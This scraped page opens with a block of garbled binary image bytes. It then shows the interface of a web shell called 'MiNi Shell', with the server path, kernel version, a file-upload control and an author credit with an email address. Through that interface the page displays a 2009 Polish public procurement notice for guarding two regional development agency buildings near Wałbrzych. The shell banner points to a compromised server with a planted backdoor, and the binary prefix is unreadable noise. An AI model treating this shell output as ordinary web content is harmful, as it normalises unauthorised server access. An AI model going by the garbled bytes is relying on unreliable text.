JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/87790-N-2009.html

<p class="kh_header"><b>Wałbrzych: Świadczenie usługi ochrony osób i mienia na rzezcz Dolnośląskiej Agencji Rozwoju Regionalnego S.A.</b><br>
<b>Numer ogłoszenia: 87790 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Agencja Rozwoju Regionalnego S.A. , ul. Wysockiego 10, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 842 69 04, faks 074 888 09 16.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi ochrony osób i mienia na rzezcz Dolnośląskiej Agencji Rozwoju Regionalnego S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi ochrona osób i mienia budynków należących do Dolnośląskiej Agencji Rozwoju Regionalnego S.A. Zamówienie będzie realizowane przez Wykonawcę wyłonionego w trybie przetargu nieograniczonego, który zaoferuje najniższą cenę za wykonanie zamówienia. Zamówienie zostanie udzielone w podziale na dwa zadania:
Zadanie nr 1: Ochrona osób i mienia budynku Regionalnego Centrum Promocji Gospodarczej przy ul. Wysockiego 10, 58-300 Wałbrzych;
Zadanie nr 2: Ochrona osób i mienia budynku Centrum Badań i Rozwoju Dolnośląskiego Parku Technologicznego w Szczawnie -Zdroju przy ul. Szczawieńskiej 2, 58-310 Szczawno- Zdrój.

Wykonawca będzie prowadził przy pomocy swojego personelu bezpośrednią ochronę fizyczną przewidzianą w  art. 3 ust. 1 i 2 ustawy o ochronie osób i mienia ( Dz. U. Z 1997 r. Nr 114, poz. 740 ) - polegającej na zapewnieniu stałej ochrony fizycznej przez pracownika ochrony na jednym posterunku całodobowym, wspomaganego wzywaną w przypadku zagrożenia Grupę Interwencyjną. Pracownicy ochrony w godzinach wieczorno- nocnych kontrolowani będą przez Dyspozytora i Grupę Interwencyjną Wykonawcy. 
Wykonawca zobowiązany jest w czasie wykonywania usług zapewnić na terenie objętym umową należyty ład, porządek, przestrzeganie przepisów BHP i p. poż. oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług oraz wskutek innych działań osób zatrudnionych przez Wykonawcę.
Wykonawca zobowiązany jest w szczególności do ochrony mienia nieruchomego 
i ruchomego w celu zabezpieczenia go przed zniszczeniem, uszkodzeniem i kradzieżą, a w szczególności do:
1.kontroli dokumentów uprawniających do wstępu, wjazdu i przebywania na ochranianym obiekcie osób i wwożonego/wywożonego mienia ,
2.ochrony mienia nieruchomego i ruchomego w celu zabezpieczenia go przed zniszczeniem, uszkodzeniem i kradzieżą,
3.sprawdzanie stanu wskazanych zamknięć, zabezpieczeń i plomb,
4.sprawdzania prawidłowości zamknięć drzwi i okien chronionych obiektów, po opuszczeniu ich przez pracowników zamawiającego,
5.informowania zamawiającego o stanie technicznego zabezpieczenia poszczególnych pomieszczeń (dotyczy to w szczególności zamków, ogrodzenia, oświetlenia, zabezpieczenia ppoż, itp.),
6.przestrzegania szczegółowych zasad odpowiedzialności za powierzone ochronie mienie,
7.przestrzegania szczegółowych wymagań dotyczących ochrony informacji niejawnych stanowiących tajemnicę służbową związanych z wykonywaniem umowy,
8.bieżącego szkolenia pracowników ochrony oraz
9.przeciwdziałanie    próbom    naruszenia    bezpieczeństwa    osobistego    pracowników w czasie wykonywania obowiązków służbowych na terenie chronionego obiektu,
10.podejmowanie  akcji  ratowniczych  w  przypadku  wystąpienia  awarii  technicznych  lub innych   zdarzeń  o charakterze   nadzwyczajnym,   oraz   informowanie o powyższych zdarzeniach i potencjalnych zagrożeniach stosownych osób i służb,
11.sprawowanie nadzoru nad właściwym ruchem osobowym,
12.sprawowanie nadzoru nad właściwym ruchem samochodowym,
13.udzielanie wszelkiej pomocy pracownikom obiektu w każdej sytuacji wymagającej interwencji agenta ochrony, 
14.wykonywanie wszelkich poleceń Zamawiającego mających na celu zapewnienie bezpieczeństwa w ochranianym obiekcie,
15.prowadzenie ewidencji ruchu osób w obiekcie wg wewnętrznych regulaminów Zamawiającego,
16.prowadzenie ewidencji korzystania z będących pod opieką kart dostępu oraz kluczy do pomieszczeń obiektu,
17.monitorowanie obiektu z wykorzystaniem posiadanego przez Zamawiającego systemu kamer (w przypadku części 2)
Wykonawca stosownie do art. 20 ustawy o ochronie osób i mienia wyposaży pracowników realizujących zamówienie w mundury służbowe, identyfikatory i oznaki pracowników ochrony umożliwiające ich identyfikację oraz identyfikacje podmiotu ich zatrudniającego. Ponadto Wykonawca wyposaży  pracowników w niezbędny sprzęt oraz środki łączności umożliwiające kontakt z Dyspozytorem oraz Grupą Interwencyjną Wykonawcy.

W zakresie Zadania nr 1 (dot. obiektu Regionalnego Centrum Badań i Rozwoju) Zamawiający zastrzega na mocy art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 oraz z 2008 r. Nr 171, poz. 1058) możliwość zmiany umowy w zakresie terminu jej wykonania. Z uwagi na planowaną sprzedaż budynku przy ul. Wysockiego 10 w Wałbrzychu, zastrzega się skrócenie okresu na jaki umowa została zawarta..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium:
część 1 zamówienia w kwocie 6.000zł
część 2 zamówienia w kwocie 6.000zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
1) posiadają uprawnienie do wykonywania działalności lub czynności objętych przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień posiadają koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji w zakresie usług ochrony,
2) posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia a mianowicie:
a) zrealizowali w okresie ostatnich trzech lat lub aktualnie realizują - w zakresie ochrony - jako główny wykonawca co najmniej jedno zamówienie o podobnym charakterze i złożoności do niniejszego, w budynkach użyteczności publicznej (urzędy, banki, itp.) przez okres minimum 12 m-cy:
(1)dla części 1 zamówienia o powierzchni użytkowej co najmniej 2.500 m2,
(2)dla części 2 zamówienia o powierzchni użytkowej co najmniej 5.000 m2,
przy czym w zakresie ochrony mieściła się  również ochrona/ monitoring miejsc parkingowych przynależnych do danego obiektu. 
b) posiadają ważną umowę ubezpieczeniową lub inny dokument ubezpieczenia od odpowiedzialności cywilnej. Wymagana suma ubezpieczenia co najmniej: 500.000,00 PLN/ jedno zdarzenie.
c) potwierdzą, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia w zakresie ochrony fizycznej - licencja I stopnia dla pracowników i licencja II stopnia dla szefa ochrony;
d) posiadają (zatrudniają) co najmniej 1 własną grupę interwencyjną składającą się z co najmniej z 2 pracowników Wykonawcy, funkcjonującą na terenie Wałbrzycha lub Szczawna- Zdroju, stanowiącą wsparcie dla pracowników ochrony obiektu, gwarantujące interwencję w czasie maksymalnym do 15 minut.
3) spełniają pozostałe warunki określone w art. 22 ust. 1 ustawy.
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia - art. 24 ust.1 i ust. 2 pkt. 1,2 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca winien złożyć:
1. Oświadczenie, którego wzór stanowi załącznik nr 2 do SIWZ, że spełnia warunki określone w art. 22 ust 1 ustawy Prawo zamówień publicznych i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 pkt.1, 2 w/w ustawy.
2. Oświadczenie w formie zgodnej z załącznikiem nr 3 do SIWZ, z treści którego wynika, że Wykonawca potwierdza wykonanie całego zakresu usługi, zapoznał się z ogólnymi warunkami umowy oraz zobowiązuje się w przypadku wyboru oferty do zawarcia umowy na proponowanych warunkach.
3. Aktualny dokument potwierdzający, że profil działalności Wykonawcy odpowiada przedmiotowi zamówienia oraz, że Wykonawca jest upoważniony do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi. Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu złożenia ofert.
4. Aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt.9 ustawy Prawo zamówień publicznych wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Zaświadczenie z Urzędu Skarbowego lub oświadczenie Wykonawcy potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków lub zaświadczenie z Urzędu Skarbowego, że uzyskał przewidzianą prawem zgodę na zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego /art. 24 ust.1.pkt.3 upzp / - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7. Zaświadczenie z właściwego Zakładu Ubezpieczeń Społecznych o nie zaleganiu z płatnościami składek na ubezpieczenia społeczne lub zdrowotne wystawione z wyjątkiem przypadku kiedy Wykonawca uzyskał przewidzianą prawem zgodę na zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu / art. 24 ust.1.pkt.3 upzp / - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8. Koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji w zakresie usługi ochrony osób i mienia w formie bezpośredniej ochrony fizycznej na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz.U. z 1999r. Nr 114, poz. 740 z późn. zm.).
9. Informację o Wykonawcy wg wzoru przedstawionego w załączniku nr 4 do SIWZ.
10. Dokumenty potwierdzające, że osoby które będą wykonywać zamówienie posiadają wymagane uprawnienia z zakresu ochrony fizycznej licencja I stopnia dla pracowników i licencja II stopnia dla szefa ochrony.
12. Wykaz usług wykonanych w okresie ostatnich trzech lat lub aktualnie realizowanych
(przez okres minimum 12 m-cy każde), a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem przedmiotu ochrony, dat wykonania i odbiorców wraz z poświadczeniem (referencje lub równoważne dokumenty), iż usługi te zostały wykonane należycie.  Wykaz powinien zawierać co najmniej 3 pozycje (maksymalnie 5), co najmniej jedno zamówienie o podobnym charakterze i złożoności do niniejszego musi być wykonane w budynkach użyteczności publicznej (sądy, prokuratury, in. urzędy, banki, itp.) o powierzchni  użytkowej co najmniej 2500 m2 dla części 1 zamówienia oraz o powierzchni użytkowej co najmniej 5000 m2 dla części 2 zamówienia.
13. Ważną umowę ubezpieczeniową lub inny dokument ubezpieczenia od odpowiedzialności cywilnej. Wymagana suma ubezpieczenia co najmniej: 500.000,00 PLN/ jedno zdarzenie.
14. Oferta winna być podpisana przez umocowanego przedstawiciela lub przedstawicieli Wykonawcy, upoważnionego do podejmowania zobowiązań w imieniu Wykonawcy zgodnie z wpisem o reprezentacji w stosownym dokumencie uprawniającym do występowania w obrocie prawnym lub udzielonym pełnomocnictwem. Pełnomocnictwo winno być dołączone do oferty o ile nie wynika z innych dokumentów załączonych przez wykonawcę w ofercie.
Wymagane powyżej dokumenty, są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
15.  Dla potwierdzenia spełnienia warunku określonego w rozdz. VI ust. 1 pkt d SIWZ Wykonawca powinien złożyć listę pracowników patroli interwencyjnych (wykaz samochodów patroli interwencyjnych i ich numery rejestracyjne, wykaz pracowników wraz z numerami ich licencji). Wzór takiego oświadczenia stanowi Załącznik nr 4 a Soecyfikacji Istotnych Warunków Zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.darr.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląska Agencja Rozwoju Regionalnego S.A. ul. Szczawieńska 2, 58-310 szczawno- Zdrój.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2009 godzina 12:00, miejsce: Dolnośląska Agencja Rozwoju Regionalnego S.A. ul. Szczawieńska 2, 58-310 szczawno- Zdrój, sekretariat (2 piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ochrona osób i mienia budynku Regionalnego Centrum Promocji Gospodarczej przy ul. Wysockiego 10, 58-300 Wałbrzych;.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) wykonanie czynności ochrony i dozoru mienia w budynkach i całej posesji obejmującej również miejsca parkingowe Centrum Badań i Rozwoju Dolnośląskiego Parku Technologicznego w Szczawnie Zdroju (CbiR) oraz Regionalnego Centrum Promocji Gospodarczej (RCPG) w formie bezpośredniej ochrony fizycznej. Zamawiający wymaga, aby Wykonawca przy pomocy zatrudnionych przez siebie pracowników ochrony sprawował stałą całodobową, bezpośrednią ochronę fizyczną mienia składającego się z budynku CbiR oraz RCPG jego pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach;
b) stała ochrona fizyczna wspomagana będzie nielimitowanymi przyjazdami grupy interwencyjnej na wezwanie alarmowe. Czas reakcji grupy interwencyjnej: przyjazd na obiekt od momentu wezwania do 15 minut.
c) zamawiający zobowiąże się informować personel Wykonawcy o sytuacjach zwiększających ryzyko powstania szkody w mieniu podlegającym ochronie;
d) Zamawiający zapewni pracownikom Wykonawcy dostęp do pomieszczenia socjalnego w miejscu wykonania zamówienia oraz możliwość korzystania z linii telefonicznej w celach związanych z wykonywaniem zamówienia;
e) Zamawiający zastrzega sobie możliwość ciągłego nadzoru nad sprawowaniem ochrony mienia. Wykonawca zobowiązany będzie do prowadzenia książki dyżurów (służby), do której personel Wykonawcy wpisywać będzie wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony mienia Zamawiającego; Zamawiający wymaga założenia i bieżącego prowadzenia przez Wykonawcę tzw. Książki Wejść i Wyjść w celu stałego monitorowania osób przebywających w budynkach podlegających ochronie poza godzinami pracy.
f) Wykonawca odpowiadać będzie wobec Zamawiającego za wszelkie szkody wyrządzone Zamawiającemu przez personel Wykonawcy oraz osoby trzecie w przypadku niedołożenia przez personel Wykonawcy należytej staranności przy wykonywaniu umowy;
g) Wykonawca zobowiązany jest w czasie wykonywania usług zapewnić na terenie objętym umową należyty ład, porządek, przestrzeganie przepisów BHP i ppoż oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług  oraz wskutek innych działań osób zatrudnionych przez Wykonawcę;
h) Wykonawca zamontuje na swój koszt system bezprzewodowego wzywania grupy interwencyjnej (system antynapadu) na portierni (miejsce posterunku) i wyposaży swoich  pracowników oraz 3 pracowników DARR SA w piloty wzywające grupę interwencyjną (3 szt.). Posterunek będzie zlokalizowany na parterze budynku.
i) Grupa interwencyjna oprócz nielimitowanych przyjazdów na wezwanie w razie podejrzenia zagrożenia będzie przyjeżdżać na obiekt i dokonywać sprawdzenia stanu bezpieczeństwa:
- w dni powszednie od poniedziałku do piątku w godz. Od 19:00 do 7:00 - trzykrotnie
- w soboty, niedziele i dni świąteczne - trzykrotnie w ciągu doby
W odstępach czasowych ustalonych w planie ochrony. Plan ochrony zostanie opracowany przez Wykonawcę w terminie 5 dni roboczych od daty podpisania umowy na podstawie wytycznych planu ochrony przekazanych Wykonawcy w dniu podpisania umowy.
j) Wykonawca wyposaży pracowników ochrony w telefon komórkowy umożliwiający łączność Zamawiającego i Wykonawcy z pracownikami ochrony na obiekcie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ochrona osób i mienia budynku Centrum Badań i Rozwoju Dolnośląskiego Parku Technologicznego w Szczawnie- Zdroju przy ul. Szczawieńskiej 2, 58-310 Szczawno- Zdrój..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) wykonanie czynności ochrony i dozoru mienia w budynkach i całej posesji obejmującej również miejsca parkingowe Centrum Badań i Rozwoju Dolnośląskiego Parku Technologicznego w Szczawnie Zdroju (CbiR) oraz Regionalnego Centrum Promocji Gospodarczej (RCPG) w formie bezpośredniej ochrony fizycznej. Zamawiający wymaga, aby Wykonawca przy pomocy zatrudnionych przez siebie pracowników ochrony sprawował stałą całodobową, bezpośrednią ochronę fizyczną mienia składającego się z budynku CbiR oraz RCPG jego pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach;
b) stała ochrona fizyczna wspomagana będzie nielimitowanymi przyjazdami grupy interwencyjnej na wezwanie alarmowe. Czas reakcji grupy interwencyjnej: przyjazd na obiekt od momentu wezwania do 15 minut.
c) zamawiający zobowiąże się informować personel Wykonawcy o sytuacjach zwiększających ryzyko powstania szkody w mieniu podlegającym ochronie;
d) Zamawiający zapewni pracownikom Wykonawcy dostęp do pomieszczenia socjalnego w miejscu wykonania zamówienia oraz możliwość korzystania z linii telefonicznej w celach związanych z wykonywaniem zamówienia;
e) Zamawiający zastrzega sobie możliwość ciągłego nadzoru nad sprawowaniem ochrony mienia. Wykonawca zobowiązany będzie do prowadzenia książki dyżurów (służby), do której personel Wykonawcy wpisywać będzie wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony mienia Zamawiającego; Zamawiający wymaga założenia i bieżącego prowadzenia przez Wykonawcę tzw. Książki Wejść i Wyjść w celu stałego monitorowania osób przebywających w budynkach podlegających ochronie poza godzinami pracy.
f) Wykonawca odpowiadać będzie wobec Zamawiającego za wszelkie szkody wyrządzone Zamawiającemu przez personel Wykonawcy oraz osoby trzecie w przypadku niedołożenia przez personel Wykonawcy należytej staranności przy wykonywaniu umowy;
g) Wykonawca zobowiązany jest w czasie wykonywania usług zapewnić na terenie objętym umową należyty ład, porządek, przestrzeganie przepisów BHP i ppoż oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług  oraz wskutek innych działań osób zatrudnionych przez Wykonawcę;
h) Wykonawca zamontuje na swój koszt system bezprzewodowego wzywania grupy interwencyjnej (system antynapadu) na portierni (miejsce posterunku) i wyposaży swoich  pracowników oraz 3 pracowników DARR SA w piloty wzywające grupę interwencyjną (3 szt.). Posterunek będzie zlokalizowany na parterze budynku.
i) Grupa interwencyjna oprócz nielimitowanych przyjazdów na wezwanie w razie podejrzenia zagrożenia będzie przyjeżdżać na obiekt i dokonywać sprawdzenia stanu bezpieczeństwa:
- w dni powszednie od poniedziałku do piątku w godz. Od 19:00 do 7:00 - trzykrotnie
- w soboty, niedziele i dni świąteczne - trzykrotnie w ciągu doby
W odstępach czasowych ustalonych w planie ochrony. Plan ochrony zostanie opracowany przez Wykonawcę w terminie 5 dni roboczych od daty podpisania umowy na podstawie wytycznych planu ochrony przekazanych Wykonawcy w dniu podpisania umowy.
j) Wykonawca wyposaży pracowników ochrony w telefon komórkowy umożliwiający łączność Zamawiającego i Wykonawcy z pracownikami ochrony na obiekcie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com